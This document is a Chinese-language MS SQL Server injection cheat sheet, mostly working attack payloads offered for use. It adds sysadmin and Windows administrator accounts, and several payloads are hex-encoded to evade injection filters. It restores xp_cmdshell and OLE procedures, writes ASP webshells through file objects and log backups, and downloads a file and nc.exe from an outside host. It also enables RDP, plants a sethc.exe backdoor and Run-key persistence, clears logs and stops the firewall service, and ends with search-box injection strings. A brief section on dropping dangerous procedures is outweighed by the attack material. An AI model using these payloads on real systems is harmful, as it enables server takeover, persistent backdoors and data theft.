SQL高级注入使用之储存过程

---------------
-- 添加SA用户--
---------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
1、exec master.dbo.sp_addlogin itpro;
2、exec master.dbo.sp_addsrvrolemember itpro,sysadmin

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
防注入 sa:itpro pass:itpro
declare @s varchar(4000) set @s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e20697470726f as varchar(4000));exec(@s); declare @c varchar(4000) set @c=cast(0x65786563206d61737465722e64626f2e73705f70617373776f7264206e756c6c2c697470726f2c697470726f as varchar(4000));exec(@c); declare @a varchar(4000) set @a=cast(0x65786563206d61737465722e64626f2e73705f616464737276726f6c656d656d6265722027697470726f272c2073797361646d696e as varchar(4000));exec(@a);-- and 1=1

一、

--------------
-恢复存储过程-
--------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_dropextendedproc "xp_cmdshell"
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
恢复cmdshell防注入
============================================================
declare @a varchar(255),@b varchar(255),@c varchar(255);
set @a=0x6D61737465722E2E73705F616464657874656E64656470726F63;
set @b=0x78705F636D647368656C6C;
set @c=0x78706C6F6737302E646C6C;
exec @a @b,@c
============================================================
恢复所有过程====
================
declare @s varchar(4000) set @s=cast(0x657865632073705F616464657874656E64656470726F63202778705F636D647368656C6C272C27787077656237302E646C6C273B20657865632073705F616464657874656E64656470726F632078705F646972747265652C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F656E756D67726F7570732C2778706C6F6737302E646C6C273B20657865632073705F616464657874656E64656470726F632078705F66697865646472697665732C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F6C6F67696E636F6E6669672C2778706C6F6737302E646C6C273B20657865632073705F616464657874656E64656470726F632078705F656E756D6572726F726C6F67732C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F67657466696C6564657461696C732C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F414372656174652C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F4144657374726F792C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F414765744572726F72496E666F2C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F4147657450726F70657274792C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F414D6574686F642C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F4153657450726F70657274792C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F4153746F702C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632078705F7265676164646D756C7469737472696E672C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F72656764656C6574656B65792C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F72656764656C65746576616C75652C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F726567656E756D76616C7565732C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F726567726561642C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F72656772656D6F76656D756C7469737472696E672C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F72656777726974652C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F617661696C61626C656D656469612C277870737461722E646C6C27 as varchar(4000));exec(@s);
============================================================
二、

----------------------------------
--恢复sp_addextendedproc存储过程--
----------------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

三、
--------------------------
--使用存储过程加管理方法--
--------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
1、master.dbo.xp_cmdshell 'net user itpro gmasfm && net localgroup administrators itpro /add'

2、EXEC sp_resolve_logins 'text', 'e:\asp\"&net user admina admin /add&net localgroup administrators admina /add&dir "e:\asp', '1.asp'

3、DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user sadfish fish /add'

4、/**exec master.dbo.xp_servicecontrol start,SQLSERVERAGENT **/
exec msdb..sp_delete_job null,'lz' exec msdb..sp_add_job 'lz' exec msdb..sp_add_jobstep null,'lz',null,'1','cmdexec','cmd /c net user itpro gmasfm /add' exec msdb..sp_add_jobserver null,'lz',@@servername exec msdb..sp_start_job 'lz'

5、exec master.dbo.xp_servicecontrol start,SQLSERVERAGENT exec msdb..sp_delete_job null,'foofoofoo' exec msdb..sp_add_job 'foofoofoo' exec msdb..sp_add_jobstep null,'foofoofoo',null,'1','cmdexec','cmd /c dir c:\' exec msdb..sp_add_jobserver null,'foofoofoo',@@servername exec msdb..sp_start_job 'foofoofoo'

6、declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","SQLDebugge")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123abc~~~"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/SQLDebugge",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/SQLDebugge"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set fso = CreateObject("Scripting.FileSystemObject")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'f = fso.DeleteFile(WScript.ScriptName)'

7、exec master.dbo.xp_servicecontrol start,SQLSERVERAGENT exec msdb..sp_delete_job null,'foofoofoo' exec msdb..sp_add_job 'foofoofoo' exec msdb..sp_add_jobstep null,'foofoofoo',null,'1','cmdexec','cmd /c dir c:\' exec msdb..sp_add_jobserver null,'foofoofoo',@@servername exec msdb..sp_start_job 'foofoofoo'
8、DECLARE @shell INT EXEC SP_OAcreate 'Shell.Application',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user sadfish fish /add'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

四、
-------------------------
-- 导出文件的存储过程 --
-------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINdows\system32\cmd.exe /c netstat -an >c:\1.txt'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

五、
---------------------------
-- 读取文件的存储过程 --
---------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\1.txt', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

六、

----------------------
-----写一句话木马-----
----------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

1\
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\Inetpub\tianhong\2.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'<%execute(request("a"))%>' ' ' 单引号为要写的内容
<%25 if request("x")<>"" then execute(request("x"))%25>

2\
DECLARE @fs int,@fi int
EXEC SP_OACreate 'Scripting.FileSystemObject',@fs OUTPUT
EXEC SP_OAMETHOD @fs,'CreateTextFile',@fs OUTPUT,'C:\InetPub\WWWRoot\Shell.asp',1
EXEC SP_OAMETHOD @fs,'WriteLine',null,'<%execute(request("a"))%>'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

防注入写入法
================================================================
declare @a int,@b int,@c varchar(255),@d varchar(255),@e varchar(255),@f varchar(255),@g varchar(255),@h varchar(255),@i varchar(255),@j varchar(255);
set @c=0x6D61737465722E2E73705F6F61637265617465;
set @d=0x6D61737465722E2E73705F6F616D6574686F64;
set @e=0x536372697074696E672E46696C6573797374656D4F626A656374;
set @f=0x4372656174655465787446696C65;
set @g=0x433A5C496E65747075625C73797374656D2E617370;
set @h=0x74727565;
set @i=0x7772697465;
set @j=0x3C256576616C20726571756573742822582229253E;
exec @c @e,@a output;
exec @d @a,@f,@b output,@g,@h;
exec @d @b,@i,null,@j
==================================================================

七、
----------------------
-----写一句话木马-----
----------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
declare @s nvarchar(4000);select @s=0x730065006c00650063007400200027003c00250045007800650063007500740065002800720065007100750065007300740028002200610022002900290025003e000d000a002700;exec sp_makewebtask 0x43003a005c007a00770065006c006c002e00610073007000, @s;-- and% 1=1
在上面一样;exec%20sp_makewebtask%20'd:\zjkdj\zjkdj\zjkds\bake.asp,'%20select%20''<%25execute(request("a"))%25>''%20';--
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

八、
----------------------
---SA沙盒模式提权-----
----------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
1、exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
1、exec master.dbo.xp_regwrite 0x484b45595f4c4f43414c5f4d414348494e45,0x536f6674576172655c4d6963726f736f66745c4a65745c342e305c456e67696e6573,0x53616e64426f784d6f6465,0x5245475f44574f5244,0-- and 1=1
2、Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user itpro gmasfm /add")');
3、Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0', ';Database=ias\ias.mdb', 'select shell("cmd.exe /c dir c:\ >c:\2.txt")')
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

九、
--------------------
-----另类SA提权-----
--------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
2、declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
1、declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

3. DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINdows\system32\cmd.exe /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe'
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

十、
--------------
--导出注册表--
--------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1、drop table [regdir];create table [regdir](value nvarchar(1000) null,data nvarchar(1000) null)--

2、delete [regdir];insert [regdir]exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port'

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

十一、

----------------
---下载程序-----
----------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1、declare @b varbinary(8000),@hr int,@http int,@down int exec sp_oacreate [microsoft.xmlhttp],@http output exec @hr = sp_oamethod @http,[open],null,[get],[http://www.918x.cn/lz/xm.rar],0 exec @hr = sp_oamethod @http,[send],null exec @hr=sp_oagetproperty @http,[responsebody],@b output exec @hr=sp_oacreate [adodb.stream],@down output exec @hr=sp_oasetproperty @down,[type],1 exec @hr=sp_oasetproperty @down,[mode],3 exec @hr=sp_oamethod @down,[open],null exec @hr=sp_oamethod @down,[write],null,@b exec @hr=sp_oamethod @down,[savetofile],null,[c:/a.asp],1 ;-- and 1=1

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

十二、

-----------------
-Log备份WebShell-
-----------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
alter database master set RECOVERY FULL
create table cmd (a image)--
backup log master to disk = 'c:\cmd' with init
insert into cmd (a) values ('<%eval(request("a")):response.end%>')--
backup log master to disk = 'C:\Inetpub\wwwroot\ri3.asp'--
drop table cmd--
2\

use mir
alter database mir set RECOVERY FULL --
create table cmd8 (a image)--
backup log mir to disk = 'c:\cmd8' with init --
insert into cmd8 (a) values ('<%eval(request("a")):response.end%>')--
backup log mir to disk = 'c:\backup.asp'--
drop table cmd8--
alter database mir set RECOVERY SIMPLE --
3\
create/**/table/**/[dbo].[shit_tmp]/**/([cmd]/**/[image])--
declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name(),@s=0x6C0061006F007A0068006F007500/**/backup/**/log/**/@a/**/to/**/disk/**/=/**/@s/**/with/**/init,no_truncate--
insert/**/into/**/[shit_tmp](cmd)/**/values(0x3C256576616C28726571756573742822612229293A726573706F6E73652E656E64253E)--
select/**/@s=0x63003a005c0031002e00610073007000/**/backup/**/log/**/@a/**/to/**/disk=@s/**/with/**/init,no_truncate--
Drop/**/table/**/[shit_tmp]--

BACKUP DATABASE [zdlchina] TO DISK = N'D:\webhost\zdlchina\UpFiles\Images\12\2002\4\15\2.rar'
all back datebase
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

十三、
-------------------------------
--创建sp_readtextfile存储过程--
-------------------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Create proc sp_readTextFile @filename sysname
as

begin
set nocount on
Create table #tempfile (line varchar(8000))
exec ('bulk insert #tempfile from "' + @filename + '"')
select * from #tempfile
drop table #tempfile
End
go

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

十四、开3389
===================================================================
1\
declare @a int,@b varchar(255),@c varchar(255),@d varchar(255),@e varchar(255),@f varchar(255),@g varchar(255);set @b=0x6D61737465722E2E73705F6F61637265617465;set @c=0x777363726970742E7368656C6C;set @d=0x6D61737465722E2E73705F6F616D6574686F64;set @e=0x72756E;set @f=0x636D64202F6320776D6963205244544F47474C45205748455245205365727665724E616D653D2725434F4D50555445524E414D4525272063616C6C20536574416C6C6F775453436F6E6E656374696F6E732031;set @g=0x74727565;EXEC @b @c,@a output;EXEC @d @a,@e,null,@f,0,@g
2\
declare @a varchar(255),@b varchar(255); set @a=0x6D61737465722E64626F2E78705F636D647368656C6C; set @b=0x636D64202F6320776D6963205244544F47474C45205748455245205365727665724E616D653D2725434F4D50555445524E414D4525272063616C6C20536574416C6C6F775453436F6E6E656374696F6E732031; exec @a @b
===================================================================
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
declare @s varchar(4000) set @s=cast(0x65786563206D61737465722E2E78705F726567726561642027484B45595F4C4F43414C5F4D414348494E45272C2753595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D546370272C27506F72744E756D62657227 as varchar(4000));exec(@s); --
declare/**/@s/**/varchar(4000)/**/set/**/@s=cast(0x65786563206D61737465722E2E78705F726567726561642027484B45595F4C4F43414C5F4D414348494E45272C2753595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D546370272C27506F72744E756D62657227/**/as/**/varchar(4000))/**/exec(@s)/**/--
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','user','REG_SZ','net user itpro itpro /add'

十五、导入v.vbs到c盘。执行下载nc.exe
===================================================================
declare @s varchar(4000) set @s=cast(0x4445434C41524520407368656C6C20494E5420455845432053505F4F416372656174652027777363726970742E7368656C6C272C407368656C6C204F555450555420455845432053505F4F414D4554484F4420407368656C6C2C2772756E272C6E756C6C2C2027433A5C57494E646F77735C73797374656D33325C636D642E657865202F63206563686F205365742078506F7374203D204372656174654F626A65637428224D6963726F736F66742E584D4C4854545022293A2078506F73742E4F70656E2022474554222C22687474703A2F2F7777772E393138782E636E2F6C7A2F6E632E657865222C30203A2078506F73742E53656E642829203A205365742073476574203D4372656174654F626A656374282241444F44422E53747265616D2229203A20734765742E4D6F6465203D2033203A20734765742E54797065203D31203A20734765742E4F70656E282920203A20734765742E57726974652878506F73742E726573706F6E7365426F647929203A20734765742E53617665546F46696C6520226E632E657865222C32203E633A5C762E76627327 as varchar(4000)) exec(@s) --
===================================================================

======================================================================================
十六，通过add_jobshell执行命令
=====================================================================================
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
go
EXECUTE msdb.dbo.sp_sqlagent_get_perf_counters
go
select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset'))
go
EXECUTE msdb.dbo.sp_sqlagent_refresh_job @job_id = 0x2760BE4692FE9647AB48B1D59E5B27A4
go
select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset')) set quoted_identifier off
go
SET TEXTSIZE 64512
go
select @@microsoftversion
go
select convert(sysname, serverproperty(N'servername'))
go
Select ISNULL(SUSER_SNAME(), SUSER_NAME())
go
EXECUTE msdb.dbo.sp_help_jobschedule @job_id = 0x2760BE4692FE9647AB48B1D59E5B27A4, @include_description = 0
go
use msdb exec sp_delete_job null,'x' exec sp_add_job 'x' exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user 1 /add' exec sp_add_jobserver Null,'x',@@servername exec sp_start_job 'x'--;
go
select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset')) set quoted_identifier off
=======================================================================

我记得2003的web目录是写在C:\WINDOWS\system32\inetsrv\MetaBase.xml
-----------------
---读取文件内容--
-----------------
exec sp_readTextFile 'c:\windows\system32\boot.dat'

xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'

--------------------------------
------写注册表提权---------------
---------------------------------
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'

cmd.exe /c echo EXEC sp_addsrvrolemember test1, sysadmin >c:\test.qry
cmd.exe /c isql -E /U alma /P /i c:\test.qry

---清除MsSql日志-------
-----------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
set nocount on
declare @logicalfilename sysname,
@maxminutes int,
@newsize int
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

----------------------
--停掉或激活某个服务--
----------------------
exec master..xp_servicecontrol 'stop','sharedaccess'
exec master..xp_servicecontrol 'start','sharedaccess'

清除日志 DUMP TRANSACTION [ITAssist] WITH NO_LOG

压缩文件

EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'c:\boot.ini'

--------------------
--列出驱动器的名称--
--------------------

EXEC [master].[dbo].[xp_availablemedia]

----------------------------------
--列出指定目录的所有下一级子目录--
----------------------------------

EXEC [master].[dbo].[xp_subdirs] 'c:\windows'

------------------------------
--列出当前错误日志的具体内容--
------------------------------

EXEC [master].[dbo].[xp_readerrorlog]

----------------------------------
-----获取当前文件的属性-----------
----------------------------------

xp_getfiledetails 'C:\Inetpub\wwwroot\shell.asp'
----------------------
--列出当前计算机名称--
----------------------

execute master..xp_getnetname

--------------------------------
-列出当前计算机的驱动器可用空间-
--------------------------------

execute master..xp_fixeddrives

========================
==列出服务器所有本地组==
========================

execute master..xp_enumgroups

======================
==获取MS SQL的版本号==
======================

execute master..sp_msgetversion

=========================================
==参数说明:目录名,目录深度,是否显示文件==
=========================================

execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1

=========================================
==列出服务器上安装的所有OLEDB提供的程序==
=========================================

execute master..xp_enum_oledb_providers

=========================
==列出服务器上配置的DNS==
=========================

execute master..xp_enumdsn

删除存储过程

drop PROCEDURE sp_addextendedproc

xp_logininfo
报告帐户、帐户类型、帐户的特权级别、帐户的映射登录名和帐户访问 Microsoft? SQL Server? 的权限路径。

EXEC xp_logininfo

EXEC xp_msver
执行权限默认授予 public 角色。
返回并允许要查询的 Microsoft? SQL Server? 版本信息。除了有关服务器实际内部版本号码的版本信息外，还返回多种环境信息。该信息可以在 Transact-SQL 语句、批处理、存储过程等环境中使用，以增强与平台无关代码的逻辑。

EXEC xp_msver
-----------------------
--删除sql危险存储过程--
-----------------------

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Drop PROCEDURE sp_makewebtask
exec master..sp_dropextendedproc xp_cmdshell
exec master..sp_dropextendedproc xp_dirtree
exec master..sp_dropextendedproc xp_fileexist
exec master..sp_dropextendedproc xp_terminate_process
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
exec master..sp_dropextendedproc xp_regaddmultistring
exec master..sp_dropextendedproc xp_regdeletekey
exec master..sp_dropextendedproc xp_regdeletevalue
exec master..sp_dropextendedproc xp_regenumkeys
exec master..sp_dropextendedproc xp_regenumvalues
exec master..sp_dropextendedproc sp_add_job
exec master..sp_dropextendedproc sp_addtask
exec master..sp_dropextendedproc xp_regread
exec master..sp_dropextendedproc xp_regwrite
exec master..sp_dropextendedproc xp_readwebtask
exec master..sp_dropextendedproc xp_makewebtask
exec master..sp_dropextendedproc xp_regremovemultistring
exec master..sp_dropextendedproc sp_OACreate
Drop PROCEDURE sp_addextendedproc
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xp_cmdshell新的恢复办法

扩展储存过程被删除以后可以有很简单的办法恢复：
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

这样可以直接恢复，不用去管sp_addextendedproc是不是存在

-----------------------------

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

开启cmdshell的sql语句

exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshell
搜索型注入
' and 1=host_name()--
' and 1=@@version--
' and 1=db_name()--
' and 1=user--
' and 1=@@servername--
%'and @@version>0 and '%'=' {得到数据库版本
%'and user>0 and '%'=' {得到帐号
%'and db_name()>0 and '%'=' {得到当前数据库
%'and @@servername>0 and '%'=' {得到服务器名称
%'and system_user>0 and '%'=' {得到系统用户
%'and (select count(*) from administrator)>0 and '%'=' {返回错误页面，看来是没有admin这个表了
%'and (select username from admin)>0 and '%'='
%'and (select password from admin)>0 and '%'='
%'and (select id from admin where ID=1)>0 and '%'='

%'declare @s varchar(4000) set @s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e20697470726f as varchar(4000));exec(@s); declare @c varchar(4000) set @c=cast(0x65786563206d61737465722e64626f2e73705f70617373776f7264206e756c6c2c697470726f2c697470726f as varchar(4000));exec(@c); declare @a varchar(4000) set @a=cast(0x65786563206d61737465722e64626f2e73705f616464737276726f6c656d656d6265722027697470726f272c2073797361646d696e as varchar(4000));exec(@a);--and '%'=' 得到itpro itpro的SA权限